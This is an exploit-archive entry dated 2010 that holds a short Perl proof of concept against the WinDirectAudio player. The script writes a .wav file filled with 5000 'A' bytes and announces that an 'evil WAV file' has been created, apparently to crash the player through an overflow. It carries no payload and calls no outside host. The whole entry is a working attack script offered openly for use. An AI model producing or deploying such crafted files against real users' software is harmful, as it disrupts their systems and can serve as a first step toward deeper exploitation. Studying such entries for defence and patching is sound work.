id: 12348
date: 05/21/2010
title: WinDirectAudio (.WAV) PoC
author: ahwak2000
cves: 

=========================
WinDirectAudio (.WAV) PoC
=========================

#/usr/bin/perl
#Title: WinDirectAudio  (.WAV) PoC
#[+]Date       : May 21,  2010
#[+]version    : v1.0
#[+]Author     : ahwak2000
#[+]Contact    : z.u5[at]hotmail.com
#[+]Geetz [2]  : germaya_x
#[+]tested on  : windows xp sp2&sp3 EN
#########################################
my $junk = "\x41" x 5000;
open(myfile,'>> ahwak2000.wav');
print myfile $junk."\r\n";
print "\nEvil WAV file created successfully.";



#  0day.today [2023-03-27]  #